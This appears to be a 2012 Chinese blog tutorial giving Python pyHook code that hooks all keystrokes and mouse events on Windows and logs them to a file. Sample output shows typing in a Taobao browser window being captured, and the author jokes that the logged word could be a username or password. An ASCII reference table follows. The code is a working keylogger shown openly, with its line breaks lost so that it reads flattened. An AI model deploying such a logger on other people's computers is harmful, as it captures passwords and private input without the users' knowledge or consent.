Python:监控键盘输入、鼠标操作,并将捕获到的信息记录到文件中
使用pyhook模块可以很快地完成键盘及鼠标事件捕获,此模块可从http://sourceforge.net/projects/pyhook/files/pyhook/1.5.1/下载,API手册:http://pyhook.sourceforge.net/doc_1.5.0/,网站上提供了个使用的例子,改写了下,将信息记录到文件中,本来想使用python的logging模块,但测试时发现,因为鼠标事件频率太高,导致写时报I/O错误的异常,所以使用了自己写文件记录日志的方式。代码:
#!/usr/bin/env python# -*- coding: utf-8 -*-import pythoncomimport pyHookimport timedef onMouseEvent(event):"处理鼠标事件"fobj.writelines('-' * 20 + 'MouseEvent Begin' + '-' * 20 + '\n')fobj.writelines("Current Time:%s\n" % time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime()))fobj.writelines("MessageName:%s\n" % str(event.MessageName))fobj.writelines("Message:%d\n" % event.Message)fobj.writelines("Time_sec:%d\n" % event.Time)fobj.writelines("Window:%s\n" % str(event.Window))fobj.writelines("WindowName:%s\n" % str(event.WindowName))fobj.writelines("Position:%s\n" % str(event.Position))fobj.writelines('-' * 20 + 'MouseEvent End' + '-' * 20 + '\n')return Truedef onKeyboardEvent(event): "处理键盘事件" fobj.writelines('-' * 20 + 'Keyboard Begin' + '-' * 20 + '\n')fobj.writelines("Current Time:%s\n" % time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime()))fobj.writelines("MessageName:%s\n" % str(event.MessageName))fobj.writelines("Message:%d\n" % event.Message)fobj.writelines("Time:%d\n" % event.Time)fobj.writelines("Window:%s\n" % str(event.Window))fobj.writelines("WindowName:%s\n" % str(event.WindowName))fobj.writelines("Ascii_code: %d\n" % event.Ascii)fobj.writelines("Ascii_char:%s\n" % chr(event.Ascii))fobj.writelines("Key:%s\n" % str(event.Key))fobj.writelines('-' * 20 + 'Keyboard End' + '-' * 20 + '\n')return Trueif __name__ == "__main__": '''Function:操作SQLITE3数据库函数Input:NONEOutput: NONEauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-1'''#打开日志文件file_name = "D:\\hook_log.txt"fobj = open(file_name,'w') #创建hook句柄hm = pyHook.HookManager()#监控键盘hm.KeyDown = onKeyboardEventhm.HookKeyboard()#监控鼠标hm.MouseAll = onMouseEventhm.HookMouse()#循环获取消息pythoncom.PumpMessages()#关闭日志文件fobj.close()
测试:--------------------Keyboard Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:01MessageName:key downMessage:256Time:6376015Window:66926WindowName:淘宝网 - 淘我喜欢! - Windows Internet ExplorerAscii_code: 103Ascii_char:gKey:G--------------------Keyboard End----------------------------------------MouseEvent Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:01MessageName:mouse moveMessage:512Time_sec:6376078Window:132584WindowName:NonePosition:(724, 344)--------------------MouseEvent End----------------------------------------MouseEvent Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:01MessageName:mouse moveMessage:512Time_sec:6376109Window:132584WindowName:NonePosition:(724, 344)--------------------MouseEvent End----------------------------------------Keyboard Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:01MessageName:key downMessage:256Time:6376625Window:66926WindowName:淘宝网 - 淘我喜欢! - Windows Internet ExplorerAscii_code: 111Ascii_char:oKey:O--------------------Keyboard End----------------------------------------Keyboard Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:02MessageName:key downMessage:256Time:6376781Window:66926WindowName:淘宝网 - 淘我喜欢! - Windows Internet ExplorerAscii_code: 111Ascii_char:oKey:O--------------------Keyboard End----------------------------------------Keyboard Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:02MessageName:key downMessage:256Time:6377000Window:66926WindowName:淘宝网 - 淘我喜欢! - Windows Internet ExplorerAscii_code: 103Ascii_char:gKey:G--------------------Keyboard End----------------------------------------Keyboard Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:02MessageName:key downMessage:256Time:6377140Window:66926WindowName:淘宝网 - 淘我喜欢! - Windows Internet ExplorerAscii_code: 108Ascii_char:lKey:L--------------------Keyboard End----------------------------------------Keyboard Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:02MessageName:key downMessage:256Time:6377187Window:66926WindowName:淘宝网 - 淘我喜欢! - Windows Internet ExplorerAscii_code: 101Ascii_char:eKey:E--------------------Keyboard End----------------------------------------MouseEvent Begin--------------------Current Time:Thu, 01 Mar 2012 15:07:07MessageName:mouse moveMessage:512Time_sec:6382093Window:132584WindowName:NonePosition:(725, 344)--------------------MouseEvent End--------------------
由上面的记录可以看出,当时我通过IE上淘宝,并且输入了google这个单词,有可能这是商品名,用户名,或者密码,呵呵。
查看Ascii_char字段即可看出输入的字母。如果没有解析出来,可通过Ascii_code字段的值到ASCII表中查找即可。
附:
ASCII(American Standard Code for Information Interchange,美国信息互换标准代码,ASCⅡ)是基于拉丁字母的一套电脑编码系统。它主要用于显示现代英语和其他西欧语言。它是现今最通用的单字节编码系统,并等同于国际标准ISO/IEC 646。
ASCII第一次以规范标准的型态发表是在1967年,最后一次更新则是在1986年,至今为止共定义了128个字符,其中33个字符无法显示(这是以现今操作系统为依归,但在DOS模式下可显示出一些诸如笑脸、扑克牌花式等8-bit符号),且这33个字符多数都已是陈废的控制字符,控制字符的用途主要是用来操控已经处理过的文字,在33个字符之外的是95个可显示的字符,包含用键盘敲下空白键所产生的空白字符也算1个可显示字符(显示为空白)。
ASCII控制字符
二进制十进制十六进制缩写可以显示的表示法名称/意义00000000000NUL␀空字符(Null)00000001101SOH␁标题开始00000010202STX␂本文开始00000011303ETX␃本文结束00000100404EOT␄传输结束00000101505ENQ␅请求00000110606ACK␆确认回应00000111707BEL␇响铃00001000808BS␈退格00001001909HT␉水平定位符号00001010100ALF␊换行键00001011110BVT␋垂直定位符号00001100120CFF␌换页键00001101130DCR␍归位键00001110140ESO␎取消变换(Shift out)00001111150FSI␏启用变换(Shift in)000100001610DLE␐跳出数据通讯000100011711DC1␑设备控制一(XON 启用软件速度控制)000100101812DC2␒设备控制二000100111913DC3␓设备控制三(XOFF 停用软件速度控制)000101002014DC4␔设备控制四000101012115NAK␕确认失败回应000101102216SYN␖同步用暂停000101112317ETB␗区块传输结束000110002418CAN␘取消000110012519EM␙连接介质中断00011010261ASUB␚替换00011011271BESC␛跳出00011100281CFS␜文件分割符00011101291DGS␝组群分隔符00011110301ERS␞记录分隔符00011111311FUS␟单元分隔符011111111277FDEL␡删除ASCII可显示字符
二进制十进制十六进制图形001000003220(空格)(␠)001000013321!001000103422"001000113523#001001003624$001001013725%001001103826&001001113927'001010004028(001010014129)00101010422A*00101011432B+00101100442C,00101101452D-00101110462E.00101111472F/001100004830000110001493110011001050322001100115133300110100523440011010153355001101105436600110111553770011100056388001110015739900111010583A:00111011593B;00111100603C<00111101613D=00111110623E>00111111633F?二进制十进制十六进制图形010000006440@010000016541A010000106642B010000116743C010001006844D010001016945E010001107046F010001117147G010010007248H010010017349I01001010744AJ01001011754BK01001100764CL01001101774DM01001110784EN01001111794FO010100008050P010100018151Q010100108252R010100118353S010101008454T010101018555U010101108656V010101118757W010110008858X010110018959Y01011010905AZ01011011915B[01011100925C\01011101935D]01011110945E^01011111955F_二进制十进制十六进制图形011000009660`011000019761a011000109862b011000119963c0110010010064d0110010110165e0110011010266f0110011110367g0110100010468h0110100110569i011010101066Aj011010111076Bk011011001086Cl011011011096Dm011011101106En011011111116Fo0111000011270p0111000111371q0111001011472r0111001111573s0111010011674t0111010111775u0111011011876v0111011111977w0111100012078x0111100112179y011110101227Az011110111237B{011111001247C|011111011257D}011111101267E~
页:
[1]